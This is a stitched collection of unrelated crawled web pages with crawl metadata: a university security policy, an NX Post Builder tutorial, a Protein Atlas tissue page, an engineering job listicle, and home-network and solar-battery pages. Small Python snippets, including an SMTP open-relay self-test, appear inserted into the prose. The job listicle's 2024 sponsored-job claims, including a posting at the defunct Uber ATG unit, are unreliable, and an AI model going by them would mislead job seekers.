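import time
from pathlib import Path

LOG_DIR = Path("/var/log/myservice")   # placeholder log location
RETENTION_DAYS = 60                     # minimum retention required above

def prune_old_logs(log_dir: Path, retention_days: int) -> None:
    cutoff = time.time() - retention_days * 86400
    for path in log_dir.glob("*.log*"):
        if path.is_file() and path.stat().st_mtime < cutoff:
            print(f"removing {path} (older than {retention_days} days)")
            path.unlink()

if __name__ == "__main__":
    prune_old_logs(LOG_DIR, RETENTION_DAYS)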
The preceding paragraphs outline minimal security precautions, which we believe apply to all systems. However many systems need additional security work. This includes particularly systems holding data such as social security numbers, medical information, and other information where confidentiality is required by law or University policy. Under the Acceptable Use Policy, staff are responsible for assessing the nature of information and services on their systems and following best practices at an appropriate level. These will often include additional precautions not listed here. In particular, data whose compromise could produce significant dangers to a user or the University should be transmitted using SSL or similar encryption techniques, and it should be stored on systems whose security has been carefully reviewed by security professionals. This includes (but is not limited to) personal data such as SSN's, medical information, student records, and credit card information. In some cases, techniques should be used to avoid storing this information at all (e.g. using an external service to handle credit card-based transactions). Passwords and other authentication information should be protected at the same level as the data which they control. Any application dealing with standard University passwords (those associated with the NetID, or with accounts on OIT administrative or general-access campus systems) should protect transmission of the passwords using SSL or an equivalent technology. In addition to overall system security, administrators are expected to control the access to confidential data provided to individual users. Access to confidential data should be provided only as needed for the person's job function, or for non-Rutgers employees, a function delegated to them by a unit at Rutgers. We recommend that units have explicit policies, so that users' obligations with respect to confidential data are clear. One example of such a policy is the Agreement for Accessing University Information. Please note the NetID/Email policy. This policy mandates transition away from use of the SSN for authentication. No new applications may be written using the SSN for authentication, and existing applications must be transitioned. While the document states that the NetID must be used, this does not apply to internal departmental applications, where the department has its own usernames. However even departmental applications may not use the SSN for authentication. We encourage departments to develop security plans for systems and information under their control. Staff from the Information Protection division are available to discuss security recommendations for specific situations. Also note the provisions in the Acceptable Use Policy and Guidelines regarding confidentiality and privacy. System administrators are expected to abide by those policies. We encourage departments to develop privacy policies consistent with the Acceptable Use Policy, and share those policies with their users and other customers. Two examples of privacy policies within OIT are available on the Computing Policies web page. These may serve as models for departments. OIT provides limited support for system administrators of common system types (Windows, Macintosh and the most common forms of Unix). This includes web areas, email lists, and regular meetings. Security issues are regularly discussed there. All systems at Rutgers are expected to control mail relaying.
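The policy above asks for SSL/TLS (with certificate checking) whenever confidential data is transmitted. As a minimal illustration rather than an official example, the sketch below uses Python's standard library to open a certificate-verified TLS connection before sending anything; the host name and payload are placeholders.

import socket
import ssl

HOST = "secure.example.edu"   # placeholder service endpoint
PORT = 443

def send_over_tls(payload: bytes) -> bytes:
    context = ssl.create_default_context()            # verifies certificates by default
    with socket.create_connection((HOST, PORT), timeout=5) as raw:
        with context.wrap_socket(raw, server_hostname=HOST) as tls:
            tls.sendall(payload)
            return tls.recv(4096)

if __name__ == "__main__":
    request = b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\nConnection: close\r\n\r\n"
    print(send_over_tls(request)[:80])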
This is an issue only for systems that are running software that delivers email. Normally this includes all Unix systems. It is not an issue for Windows and Macintosh systems unless software such as Mercury or Exchange has been installed. Note that the software we're talking about is software that delivers mail, not mail reading software such as Netscape Communicator, Pegasus, or Outlook Express. Systems that run mail delivery software must be set up to reject attempts by systems outside Rutgers to get them to relay email to other systems outside Rutgers. For a specific discussion of this issue, see Dealing with Spam Being Forwarded by Your System.
OIT reserves the right to take action when problems on an individual system affect other systems at Rutgers or on the Internet as a whole. Examples of situations where OIT would take action include, but are not limited to:
- systems are compromised by a hacker, and are then used as a base to launch attacks against other systems
- systems are used to relay spam
- users on a system send abusive email, or post information (e.g. as web pages) that violates University policy or copyright laws.
Where possible OIT will attempt to notify the owner or administrator of a system before taking action. As described above, OIT staff will use the RP records and Network Liaison to locate staff to notify. However immediate action may be necessary when there is an ongoing attack against other systems, or when the problem is seriously interfering with the performance of the network. Depending upon the nature of the problem, the system in question, or the entire departmental network of which it is a part, may be disconnected from RUnet or the Internet. When immediate disconnection is not necessary, system administrators will still be expected to take prompt action, to diagnose the problem, to stop any ongoing abuse, and to make whatever changes are needed to prevent recurrence. Generally this will involve adopting "best practices" for security. This process should preserve any evidence that might be needed to locate the source of the problem and take any legal or disciplinary action that might be appropriate. When OIT has referred a problem to a system administrator for action, a brief report on the resolution should be made. This will allow OIT staff to verify that all problems are dealt with, and to maintain statistics on the types of problems that are occurring. System administrators are also encouraged to notify the Information Protection division of problems that they discover themselves. From time to time, OIT also conducts scans for problems, in an attempt to discover security weaknesses before someone uses them to break into systems. System administrators will be notified of problems discovered by this process. Normally this notification will be accompanied by advice on how to remedy the problem. Remedying problems of this sort is not as time-critical as dealing with actual break-ins. However system administrators are expected to deal with the problems in a timely fashion, and report the results.
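A quick way to check the relaying requirement above is to ask the server to accept a message from one outside address to another and confirm that it refuses. The sketch below uses Python's smtplib; the host and test addresses are placeholders, and it should only be run against servers you are responsible for.

import smtplib

MAIL_HOST = "mail.example.edu"                # placeholder: server under test
OUTSIDE_SENDER = "probe@outside-a.example"    # placeholder external sender
OUTSIDE_RCPT = "target@outside-b.example"     # placeholder external recipient

def relays_for_outsiders(host: str) -> bool:
    with smtplib.SMTP(host, 25, timeout=10) as smtp:
        smtp.ehlo()
        smtp.mail(OUTSIDE_SENDER)
        code, _ = smtp.rcpt(OUTSIDE_RCPT)
        smtp.rset()
    return 200 <= code < 300                  # a 2xx reply means the relay was accepted

if __name__ == "__main__":
    if relays_for_outsiders(MAIL_HOST):
        print("WARNING: server accepted relaying between outside domains")
    else:
        print("OK: relay attempt was refused")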
systems_science
http://www.endesin.com/nx-technical-articles/post-builder-custom-commands
2018-03-23T16:49:52
s3://commoncrawl/crawl-data/CC-MAIN-2018-13/segments/1521257648404.94/warc/CC-MAIN-20180323161421-20180323181421-00250.warc.gz
0.904083
1,398
CC-MAIN-2018-13
webtext-fineweb__CC-MAIN-2018-13__0__183134007
en
Post Builder Custom Commands
In this NX A to Z article, we are going to talk about writing custom commands in Post Builder. Custom commands allow you to get just about whatever you want in your machine code file. We all know that the graphical tools within Post Builder provide a great way to configure the standard components of a postprocessor, but what about the non-standard stuff – that is what custom commands are for. For an introduction to Post Builder, see the linked article.
Postprocessors written for NX are written in a language called TCL (Tool Command Language). TCL is a scripting language, meaning that it is not compiled, and its syntax resembles C. TCL is a fairly straightforward language; however, its syntax can be troublesome. The link below is a very good resource for learning TCL; however, the best method for writing TCL is to copy it from an existing custom command that implements the same function you are trying to implement and then change the variables and expressions as required. For example, if you are trying to write an if…else loop, just find one in an existing custom command and change it as required to suit your desired functionality. This will help to eliminate a lot of the headaches due to syntax errors.
Manufacturing Output Manager (MOM)
Before you write custom commands, you first need to understand how NX communicates with your postprocessor. When you postprocess a program from within NX, NX starts a program called NX Post. The primary component of NX Post is the Manufacturing Output Manager (MOM). MOM is described in the NX Help Documentation as follows: The Manufacturing Output Manager (MOM) is the central core of the NX Post postprocessor module. MOM converts tool paths from model files into manufacturing output (machine code) by adding the required functions and data as described below:
- The Event Generator reads through the tool path data, extracts events and their associated variable information, then passes the events to MOM for processing.
- MOM applies kinematics to the output then passes the event with its associated data to the Event Handler.
- The Event Handler creates the event, processes it to determine the actions required, then returns the data to MOM.
- MOM reads the Definition File to determine how to format the output for the machine tool control.
- MOM writes the formatted output to the specified Output File as machine code.
So, essentially, MOM reads the tool path in NX and then feeds the tool path through the postprocessor to generate the machine code. In order to write custom commands, you have to intercept the information that MOM is sending to the postprocessor, manipulate it however you want, and then send it to the machine code file. All of the information that MOM sends is in the form of MOM variables; furthermore, there are built-in commands available for you to use in your custom command, and these are called MOM commands. You can see all of these variables and built-in commands and their descriptions by opening the menu in Post Builder and selecting Browse MOM Variables. You will see the window shown below. The built-in commands start with an uppercase MOM_ prefix and the variables with a lowercase mom_ prefix. There are way too many built-in commands and variables to go through them. The approach that we will use is to set out to do something specific with our postprocessor and then use the MOM Variables browser to find the variables and built-in commands we need. So the next step is to open our postprocessor and select the tab as shown below.
This is a postprocessor that comes with NX for a 5-axis table-table mill. Most of the custom commands that you see in the list are created by default when you create a new postprocessor. Some are used by default in certain parts of the program and the rest are available should you need them. For example, the custom command shown below is put into the tool change event by default when a new post is created. It uses a built-in command to force the output of the tool length compensation data. Some custom commands are driven by machine control events in NX and do not appear in any tool path events. Others are not used by default and must be placed in an event marker after the post has been created if they are to be used. There is also a library of custom commands available to be imported into a postprocessor. If you click the import option you will see the list shown below. There are a lot of custom commands available and they are described in the Documentation under Manufacturing->Post Builder->Program and Tool Path->Custom Command->Custom Command Library.
So enough about all the custom commands that are already done; let's write one of our own. It is just a simple custom command to put the name of the program at the start of the machine code file. In Post Builder, click on the Custom Command tab and Post Builder will create a copy of whatever custom command you have selected, as shown below. So delete all the code and rename the custom command. Now we need a variable that comes from NX with the name of the program and a built-in command that will output the name to the machine code file. If you open the MOM Variables Browser and search for the program name, you will see that mom_group_name is the variable that we want, and if you change the search category and search for output, you will see that MOM_output_literal is the built-in command that we want. So in our custom command, we type:
global mom_group_name
MOM_output_literal "Program Name: $mom_group_name"
The first line is a variable declaration. We are declaring the variable mom_group_name, and the global statement indicates the scope of the variable. The global scope is the entire MOM process, meaning that if there is already a variable with that name anywhere in the MOM process, we will be accessing that variable. It also means that if we change the variable, it will be changed for the entire MOM process until it is changed again by MOM. So essentially we are grabbing the variable from MOM and writing it out to the machine code file. The $ in the second line is a syntax character: it indicates that the word that follows is a variable name and substitutes the variable's value into the output. This is shown below. Then we place this custom command in the Program Start Sequence, as shown below. Then post a program and this is what you get. That's it. Remember, your best bet is to find an existing custom command that does something similar to what you want and start changing it to get what you want. We'll talk about debugging custom commands in a future article.
systems_science
http://www.cs.up.ac.za/
2015-03-05T23:56:45
s3://commoncrawl/crawl-data/CC-MAIN-2015-11/segments/1424936465069.3/warc/CC-MAIN-20150226074105-00061-ip-10-28-5-156.ec2.internal.warc.gz
0.885767
239
CC-MAIN-2015-11
webtext-fineweb__CC-MAIN-2015-11__0__100377154
en
Research Director of Brussels AI Lab receives Honorary Doctorate
Marco Dorigo, a research director for the Belgian Funds for Scientific Research (FNRS) and a co-director of IRIDIA, the artificial intelligence lab of the Université Libre de Bruxelles, will be receiving an honorary doctorate from the University of Pretoria in April 2015. Marco Dorigo has collaborated extensively with CIRG, the Computational Intelligence Research Group of the Department of Computer Science, University of Pretoria. This has resulted in a series of groundbreaking papers in swarm intelligence. Marco Dorigo will be presenting a talk on Swarm robotics research at IRIDIA at 15h30 on 20 April (see second news item).
Welcome to the Department of Computer Science at the University of Pretoria. Our main objective is to explore and research the scientific basis of new technologies. We furthermore promote the proliferation of reliable, robust and innovative computing and information technologies into the IT industry in South Africa. Excellence in computer science education, the development of internationally and nationally recognised research initiatives, and strong industry collaboration, are the driving factors underpinning the success of the department.
systems_science
https://v18.proteinatlas.org/humanproteome/tissue/appendix
2024-02-26T08:39:46
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474653.81/warc/CC-MAIN-20240226062606-20240226092606-00298.warc.gz
0.909999
2,104
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__200183094
en
The appendix-specific proteome
The appendix, also called appendix vermiformis, is a blind-ended short intestinal protrusion extending from the large intestine's cecum. The histology of the appendix resembles the histology of the colon, with the four layers of mucosa, submucosa, muscularis externa and serosa. Unlike the large intestine, however, the submucosa of the appendix contains nodules of lymphoid tissue. The transcriptome analysis shows that 71% (n=13903) of all human proteins (n=19613) are expressed in the appendix and 200 of these genes show an elevated expression in appendix compared to other tissue types. An analysis of the genes with elevated expression in appendix, with regards to function, reveals that they are dominantly involved in immune system processes.
- 2 appendix enriched genes
- 200 genes defined as elevated in the appendix
- Most of the elevated genes in appendix encode proteins involved in immune system processes
- Most group-enriched genes are shared with lymph node
Figure 1. The distribution of all genes across the five categories based on transcript abundance in appendix as well as in all other tissues. 200 genes show some level of elevated expression in the appendix compared to other tissues. The three categories of genes with elevated expression in appendix compared to other organs are shown in Table 1.
Table 1. Number of genes in the subdivided categories of elevated expression in appendix.
Category | Definition | Number of genes
Tissue enriched | At least five-fold higher mRNA levels in a particular tissue as compared to all other tissues | 2
Group enriched | At least five-fold higher mRNA levels in a group of 2-7 tissues | 47
Tissue enhanced | At least five-fold higher mRNA levels in a particular tissue as compared to average levels in all tissues | 151
Total number of elevated genes in appendix: 200
Protein expression of genes elevated in appendix
The list of elevated genes (n=200) is well in line with the function of the appendix, as it includes an overrepresentation of proteins associated with immune system processes. Among the genes elevated only in appendix (n=153) there is an overrepresentation of proteins involved in response to stimulus and chemotaxis, indicative of an active inflammation. CXCR1 and CXCR2, two receptors for IL-8 (also known as neutrophil chemotactic factor), both show an enhanced expression in appendix. IL-8 induces chemotaxis in neutrophils, and thereby neutrophils are attracted to the site of infection. An inflammatory reaction pattern could reflect that appendix samples were obtained from cases with some degree of appendicitis. There were only two genes in the category of genes with tissue enriched expression in the appendix: ACOD1 and TNFRSF6B. This is not unexpected as the included cell types, function and morphological features of the appendix are highly similar to other related tissue types, such as the lymph node, tonsil and spleen. Genes that specifically signify these types of tissues will thus be categorized as group enriched genes (see below).
The appendix transcriptome
An analysis of the expression levels of each gene makes it possible to calculate the relative mRNA pool for each of the categories. The analysis shows that 86% of the mRNA molecules in the appendix corresponds to housekeeping genes and only 2% of the mRNA pool corresponds to genes categorized to be either appendix enriched, group enriched, or enhanced. Thus, most of the transcriptional activity in the appendix relates to proteins with presumed housekeeping functions as they are found in all tissues and cells analyzed.
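The five-fold rules in Table 1 are straightforward to express in code. The sketch below (Python) applies simplified versions of the three definitions to a toy expression matrix; the gene names and values are invented, and the group-enriched test is reduced to a fixed group of two tissues for brevity, whereas the real definition allows groups of 2-7.

TISSUES = ["appendix", "colon", "spleen", "lung", "liver"]

expression = {                      # gene -> expression per tissue (same order as TISSUES)
    "GENE_A": [50.0, 2.0, 3.0, 1.0, 0.5],    # high only in appendix
    "GENE_B": [40.0, 4.0, 35.0, 2.0, 1.0],   # high in appendix and spleen
    "GENE_C": [25.0, 6.0, 5.0, 4.0, 3.0],    # elevated vs the average but not vs every tissue
}

def classify(values, tissue_index=0, fold=5.0):
    target = values[tissue_index]
    others = [v for i, v in enumerate(values) if i != tissue_index]
    if all(target >= fold * v for v in others):
        return "tissue enriched"
    # simplified group-enriched test: only considers a group of two tissues
    group = sorted(values, reverse=True)[:2]
    rest = sorted(values, reverse=True)[2:]
    if min(group) >= fold * max(rest) and target in group:
        return "group enriched"
    if target >= fold * (sum(others) / len(others)):
        return "tissue enhanced"
    return "not elevated"

for gene, values in expression.items():
    print(gene, "->", classify(values))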
Proteins specifically expressed in neutrophils
One of the most highly expressed genes in the appendix is FPR1. FPR1 encodes a G protein-coupled receptor protein expressed by e.g. neutrophils, and plays a role in chemotaxis, phagocytosis and generation of reactive oxygen species. The immunohistochemical staining shows strong positivity in a cell population indicative of phagocytes in bone marrow, appendix, as well as in many other tissues.
Proteins specifically expressed in peripheral blood leukocytes
The FCN1 gene shows an elevated expression in appendix and bone marrow. M-ficolin encoded by the gene FCN1 is predominantly expressed in peripheral blood leukocytes, and has been postulated to function as a plasma protein with elastin-binding activity.
Proteins specifically expressed in endothelial cells
The VIP gene, vasoactive intestinal peptide, encodes for a 28-amino-acid polypeptide, which stimulates the secretion of electrolytes and water by the intestinal mucosa. The VIP gene shows an elevated expression in appendix, colon, rectum, smooth muscle and small intestine, and immunohistochemical staining reveals distinct positivity in blood vessel endothelial cells.
Proteins specifically expressed in B-cells
The lymphoid nodules of the appendix contain dense collections of B-lymphocytes, as shown by the elevated expression of the MS4A1 gene in appendix, spleen, lymph node and tonsil. The protein CD20 encoded by the MS4A1 gene is an activated-glycosylated phosphoprotein expressed on the surface of B-cells beginning at the pro-B phase with progressively increasing concentrations until maturity.
Genes shared between appendix and other tissues
There are 47 group-enriched genes expressed in the appendix. Group enriched genes are defined as genes showing a 5-fold higher average level of mRNA expression in a group of 2-7 tissues, including appendix, compared to all other tissues. In order to illustrate the relation of appendix tissue to other tissue types, a network plot was generated, displaying the number of genes shared between different tissue types.
Figure 2. An interactive network plot of the appendix enriched and group enriched genes connected to their respective enriched tissues (grey circles). Red nodes represent the number of appendix enriched genes and orange nodes represent the number of genes that are group enriched. The sizes of the red and orange nodes are related to the number of genes displayed within the node. Each node is clickable and results in a list of all enriched genes connected to the highlighted edges. The network is limited to group enriched genes in combinations of up to 4 tissues, but the resulting lists show the complete set of group enriched genes in the particular tissue.
The network plot shows that most genes are shared with lymph node, although most genes shared with lymph node are also shared with other tissues harboring a major component of lymphoid cells, i.e. tonsil and spleen. It is well accepted that the immune tissue called gut associated lymphoid tissue (GALT) is important for fighting pathogens passing through the glandular epithelium of the gut. However, the function of the appendix is much debated due to the apparent lack of importance, as judged by an absence of side effects following appendectomy. One hypothesis is that the appendix constitutes a vestigial remnant of a once larger cecum, while another hypothesis suggests that it acts as storage for beneficial bacteria during times of illness.
Figure 3. Schematic view of the appendix.
Attribution: By Mariana Ruiz Villarreal (LadyofHats) (Own work) [Public domain], via Wikimedia Commons. Image has been cropped.
The histology of human appendix including detailed images and information can be viewed in the Protein Atlas Histology Dictionary.
Here, the protein-coding genes expressed in the appendix are described and characterized, together with examples of immunohistochemically stained tissue sections that visualize protein expression patterns of proteins that correspond to genes with elevated expression in the appendix.
Transcript profiling and RNA-data analyses based on normal human tissues have been described previously (Fagerberg et al., 2013). Analyses of mRNA expression including over 99% of all human protein-coding genes were performed using deep RNA sequencing of 172 individual samples corresponding to 37 different human normal tissue types. RNA sequencing results of 3 fresh frozen tissues representing normal appendix were compared to 169 other tissue samples corresponding to 36 tissue types, in order to determine genes with elevated expression in appendix. A tissue-specific score, defined as the ratio between mRNA levels in appendix compared to the mRNA levels in all other tissues, was used to divide the genes into different categories of expression. These categories include: genes with elevated expression in appendix, genes expressed in all tissues, genes with a mixed expression pattern, genes not expressed in appendix, and genes not expressed in any tissue. Genes with elevated expression in appendix were further sub-categorized as i) genes with enriched expression in appendix, ii) genes with group enriched expression including appendix and iii) genes with enhanced expression in appendix.
Human tissue samples used for protein and mRNA expression analyses were collected and handled in accordance with Swedish laws and regulation and obtained from the Department of Pathology, Uppsala University Hospital, Uppsala, Sweden as part of the sample collection governed by the Uppsala Biobank. All human tissue samples used in the present study were anonymized in accordance with approval and advisory report from the Uppsala Ethical Review Board.
Relevant links and publications
Uhlén M et al, 2015. Tissue-based map of the human proteome. Science. PubMed: 25613900 DOI: 10.1126/science.1260419
Yu NY et al, 2015. Complementing tissue characterization by integrating transcriptome profiling from the Human Protein Atlas and from the FANTOM5 consortium. Nucleic Acids Res. PubMed: 26117540 DOI: 10.1093/nar/gkv608
Fagerberg L et al, 2014. Analysis of the human tissue-specific expression by genome-wide integration of transcriptomics and antibody-based proteomics. Mol Cell Proteomics. PubMed: 24309898 DOI: 10.1074/mcp.M113.035600
Andersson S et al, 2014. The transcriptomic and proteomic landscapes of bone marrow and secondary lymphoid tissues. PLoS One. PubMed: 25541736 DOI: 10.1371/journal.pone.0115911
systems_science
https://fixcarz.com/50-hr-engineering-jobs-in-usa-with-visa-sponsorship/
2024-04-15T19:56:02
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817014.15/warc/CC-MAIN-20240415174104-20240415204104-00697.warc.gz
0.897411
1,859
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__52478394
en
As we look towards 2024, a significant trend is emerging: an increasing number of companies are offering $50/hr engineering jobs, complete with visa sponsorship for international talents. This shift is not only a reflection of the growing need for skilled engineers but also indicates a more inclusive approach to hiring, recognizing the value of global expertise in driving innovation and growth. For engineers around the world, this presents an unprecedented opportunity. Whether you’re a seasoned professional or a recent graduate, the prospect of working in the USA with a substantial salary and the support of visa sponsorship is a game-changer. In this blog post, we’ll delve into what these roles entail, the types of engineering jobs most in demand, and how you can position yourself to be a top candidate for these lucrative positions. Stay tuned as we explore the landscape of $50/hr engineering jobs in the USA for 2024 and how you can be a part of this exciting wave of career opportunities.
$50/hr Engineering Jobs in USA With Visa Sponsorship
Salary figures and visa sponsorship availability can vary depending on the specific company, location, and candidate experience. This list is based on current trends and research and may not be exhaustive.
1. Software Engineer (Embedded Systems) at Tesla, Austin, TX:
- Overview: Dive into the cutting-edge world of electric vehicles by developing and maintaining software for embedded systems in Tesla cars. Your work will directly impact the performance, reliability, and safety of these innovative vehicles. Expect to tackle challenges like real-time operating systems and low-level programming and ensure high-performance code execution within strict memory constraints. You’ll collaborate with a team of passionate engineers pushing the boundaries of electric vehicle technology and potentially contribute to future projects like self-driving cars and energy storage solutions.
- Key Skills: C/C++, real-time operating systems, embedded systems programming, understanding of automotive systems.
2. Machine Learning Engineer at Google AI, Mountain View, CA:
- Overview: Be at the forefront of artificial intelligence by designing and implementing machine learning algorithms for Google’s diverse array of products. You’ll tackle real-world problems with cutting-edge technology, shaping how millions of users interact with Google services. Expect to work with complex datasets, explore various machine learning techniques like deep learning and reinforcement learning, and collaborate with world-renowned AI experts. Prepare to continuously learn and adapt as the field of AI evolves rapidly.
- Key Skills: Python, TensorFlow, machine learning principles, statistics, data analysis.
3. Backend Engineer at Amazon Web Services (AWS), Seattle, WA:
- Overview: Build and maintain the backbone of the cloud computing giant, AWS. You’ll be responsible for designing, developing, and deploying highly available and scalable backend systems that power millions of users around the globe. Expect to work with distributed systems, cloud technologies like Amazon S3 and EC2, and large codebases written in languages like Java or Python. This role demands strong problem-solving skills, the ability to handle high pressure, and a passion for building robust and reliable systems.
- Key Skills: Java or Python, distributed systems, cloud computing, scalability, database design.
4. Systems Engineer at SpaceX, Hawthorne, CA:
- Overview: Play a crucial role in supporting SpaceX’s ambitious space exploration endeavours. You’ll design, deploy, and maintain the complex IT infrastructure that keeps SpaceX operations running smoothly, from satellite networks to launch control systems. Prepare to work with cutting-edge technologies, troubleshoot complex issues, and ensure the secure and reliable functioning of critical systems. This role demands a strong understanding of networking, security, cloud technologies and the ability to handle diverse technical challenges.
- Key Skills: Networking, security, cloud technologies, IT infrastructure, problem-solving.
5. Data Scientist at Uber ATG, Pittsburgh, PA:
- Overview: Shape the future of autonomous vehicles by developing and applying data science algorithms to Uber’s self-driving car technology. You’ll analyze massive datasets, build predictive models, and improve the perception, decision-making, and navigation capabilities of self-driving cars. Expect to work with cutting-edge tools like lidar and radar sensors, collaborate with experts in robotics and machine learning, and contribute to a technology that has the potential to revolutionize transportation.
- Key Skills: Python, statistics, machine learning, data analysis, sensor fusion.
6. Petroleum Engineer at Schlumberger, Houston, TX:
- Overview: Embark on a challenging and rewarding career in the heart of the oil and gas industry. As a Petroleum Engineer at Schlumberger, you’ll design and implement efficient drilling and production strategies for oil and gas wells. This involves a deep understanding of reservoir engineering principles, utilizing specialized software to analyze well data, and working closely with geologists and drilling crews. Prepare for exciting on-site experiences, the potential for international assignments, and the satisfaction of contributing to a vital energy source for the world.
- Key Skills: Reservoir engineering, petroleum software, drilling technology, well analysis, data visualization.
7. Aerospace Engineer at Boeing, Seattle, WA:
- Overview: Take flight with one of the leading aerospace companies in the world. As an Aerospace Engineer at Boeing, you’ll be involved in the design and analysis of aircraft structures and systems, ensuring the safety, performance, and airworthiness of these majestic machines. Expect to work with complex engineering software, collaborate with teams of experienced engineers, and potentially contribute to iconic Boeing aircraft like the 787 Dreamliner or the 737 MAX. This role demands meticulous attention to detail, strong analytical skills, and a passion for aviation technology.
- Key Skills: Aerospace engineering principles, structural analysis, computational fluid dynamics, aircraft systems, FAA regulations.
8. Civil Engineer at AECOM, New York, NY:
- Overview: Shape the urban landscape of one of the most vibrant cities in the world. As a Civil Engineer at AECOM, you’ll be involved in the design and management of critical infrastructure projects, including roads, bridges, and buildings. Expect to work with advanced design software, collaborate with architects and contractors, and ensure the structural integrity and safety of your projects. This role demands strong problem-solving skills, knowledge of building codes and regulations, and a passion for creating sustainable and resilient infrastructure.
- Key Skills: Structural engineering, AutoCAD, construction management, project planning, geotechnical engineering.
9. Chemical Engineer at ExxonMobil, Houston, TX:
- Overview: Be at the forefront of the chemical industry by developing and optimizing processes for oil and gas production at ExxonMobil. You’ll utilize your knowledge of chemical engineering principles and process simulation software to improve efficiency, reduce emissions, and ensure the safe and sustainable extraction of these valuable resources. Expect to work in a dynamic environment, collaborate with geologists and chemical technicians, and potentially contribute to groundbreaking technological advancements in the energy sector.
- Key Skills: Chemical engineering principles, process simulation software, thermodynamics, fluid mechanics, reaction engineering.
10. Electrical Engineer at Tesla, Fremont, CA:
- Overview: Join the electrifying world of electric vehicles and energy products by designing and developing electrical systems at Tesla. You’ll tackle diverse challenges like circuit design, power electronics, and control systems, ensuring the efficient and reliable operation of these innovative technologies. Expect to work with cutting-edge components, collaborate with a team of passionate engineers, and potentially contribute to projects like the Powerwall home battery system or the highly anticipated Cybertruck. This role demands strong electrical engineering fundamentals, knowledge of control theory, and a passion for pushing the boundaries of clean energy technology.
- Key Skills: Circuit design, power electronics, control systems, motor control, renewable energy.
As we conclude our exploration of the $50/hr engineering jobs in the USA with visa sponsorship for 2024, it’s clear that the opportunities are both diverse and plentiful. From the innovative world of software engineering in bustling tech hubs to the critical infrastructure projects managed by civil engineers, the landscape is ripe with prospects for talented engineers worldwide. These roles not only offer financial rewards but also the chance to be at the forefront of technological and industrial advancements. The added benefit of visa sponsorship makes these positions even more accessible to international talent, signalling a more inclusive and globally connected engineering workforce.
For engineers aspiring to take their careers to new heights, the USA in 2024 presents a landscape of opportunity. Whether it’s contributing to the next generation of technology in Silicon Valley, designing sustainable infrastructure, or pushing the boundaries of machine learning, the scope for impact and growth is immense. As industries continue to evolve and integrate new technologies, the demand for skilled engineers is set to remain high, making this an ideal time to pursue these lucrative and fulfilling career paths. For those ready to embark on this journey, the future is not just promising; it’s bright with potential.
systems_science
http://www.digitalhomenetworks.com/home-computer-networks/
2022-12-04T04:47:51
s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710962.65/warc/CC-MAIN-20221204040114-20221204070114-00766.warc.gz
0.94319
471
CC-MAIN-2022-49
webtext-fineweb__CC-MAIN-2022-49__0__29333035
en
Home Computer Networks Design & Installation Service
Home computer networks were originally installed to support maybe just one “techy” user for email and internet access. Going back a few years, most families either didn’t need or couldn’t afford more than one computer. Nowadays, in addition to using computers for e-mail, people use them for schoolwork, shopping, instant messaging, downloading music and videos, and playing games. For many families, one computer is no longer enough. In a household with multiple computers, a home computer network often becomes a necessity rather than an expensive luxury.
Computer networks for the home can be installed using either wired or wireless technology. A wired system has been the traditional choice in homes, but Wi-Fi wireless technologies have surpassed wired connections in recent years. Both wired and wireless can claim advantages over the other; both represent practical options for the home.
The home computer network has evolved to support a growing number of networkable devices, which include CCTV systems, TV systems, home media servers, Blu-ray recorders, VoIP telephone systems and alarm systems. Many of these modern devices can be accessed and controlled by a computer’s web browser or product-specific software. Home entertainment products that have built-in DLNA functionality will allow the sharing of content between a wide range of products connected to a home computer network. For example, you could record a TV programme on a recording device located in the lounge, then play back the content on a TV located in an upstairs bedroom without physically moving the recording device. The content is simply streamed over your Wi-Fi or wired home network.
Prior to quoting for the installation of our home computer networks, one of our technical engineers will visit your home to perform a site survey. We encourage potential customers to take an active role in this process to ensure that you have a full appreciation of what is required. Our system engineer will then prepare a fully itemised quotation, which details all of the equipment required to install a system which fully meets all of your home computer network requirements. For further information, advice or a quotation on our home computer networks, please email us. Our home computer network installers are available in the Redditch, Bromsgrove, Droitwich, Evesham, Worcester and Birmingham areas.
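DLNA devices find each other with SSDP, a simple discovery protocol carried over UDP multicast. As a generic illustration of how media servers are discovered on a home network (not tied to any particular product or installer), the sketch below (Python) sends an SSDP M-SEARCH and prints whoever answers; the search target is set to DLNA-style media servers.

import socket

SSDP_ADDR = ("239.255.255.250", 1900)    # standard SSDP multicast group and port
MSEARCH = "\r\n".join([
    "M-SEARCH * HTTP/1.1",
    "HOST: 239.255.255.250:1900",
    'MAN: "ssdp:discover"',
    "MX: 2",
    "ST: urn:schemas-upnp-org:device:MediaServer:1",   # look for media servers
    "", "",
]).encode()

def discover(timeout=3.0):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(MSEARCH, SSDP_ADDR)
    found = []
    try:
        while True:
            data, addr = sock.recvfrom(4096)
            found.append((addr[0], data.decode(errors="replace").splitlines()[0]))
    except socket.timeout:
        pass
    return found

if __name__ == "__main__":
    for ip, status in discover():
        print(ip, status)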
systems_science
https://www.rfepl.com/copy-of-energy-storage-system
2024-02-26T12:02:58
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474659.73/warc/CC-MAIN-20240226094435-20240226124435-00286.warc.gz
0.935433
2,173
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__203972807
en
Storage acts as an Insurance Policy for Sunshine. If you’ve been looking to install a solar panel system recently, you’ve probably come across the topic of solar batteries. Despite the fact that battery systems are becoming increasingly popular, many still don’t know a lot about them. India with abundant sunshine and a unique confluence of supply and demand situation is an ideal location to combine solar with ESS (energy storage system). Solar batteries let you store the energy that your solar panels produce for later use. Pairing your solar panels with solar batteries to create what is known as a ‘hybrid solar system’ comes with a number of advantages, including access to reliable backup power and independence from your utility. But how exactly do solar batteries work? And more importantly, how much do they cost? Keep reading to find out. Energy Storage System How Solar & Batteries Work? Solar batteries store the extra solar energy your panels produce that you don't immediately use, so you can draw from it later. See, solar panels produce the most electricity during the middle of the day, which also happens to be the time when your home uses the least amount of electricity. With a regular grid-tied solar system, that excess solar energy gets sent back to the utility grid. However, when solar panels are paired with a battery, that excess electricity goes into the battery instead of going to the grid. Then, when the sun goes down and your panels aren’t producing electricity anymore, you can use the energy you have stored in your battery - instead of paying for electricity from the utility. This means you get to power your home/business with all of the clean, renewable solar power your solar panels produce no matter what time of day it is. Factors that determine battery 